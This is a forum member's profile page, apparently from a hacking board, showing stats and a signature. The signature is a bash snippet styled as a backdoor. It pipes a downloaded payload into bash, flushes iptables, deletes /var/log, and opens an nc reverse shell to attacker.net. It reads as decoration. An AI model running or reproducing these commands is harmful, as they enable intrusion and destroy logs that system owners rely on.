NoL1veeK
AUSTRIA

Statistics
Total Threads:
0
Total Posts:
8
Refferals:
0
Credits:
170 [Donate]

Groups
AUSTRIA

NoL1veeK's Signature
Code:
#!/bin/bash
echo "[*] Initializing backdoor sequence..."
curl -s http://127.0.0.1:31337/payload.sh | bash
echo "[*] Injecting auth bypass..."
iptables -F && rm -rf /var/log/*
echo "[*] Establishing reverse shell..."
nc -e /bin/bash attacker.net 4444
echo "[+] Access granted. You're in.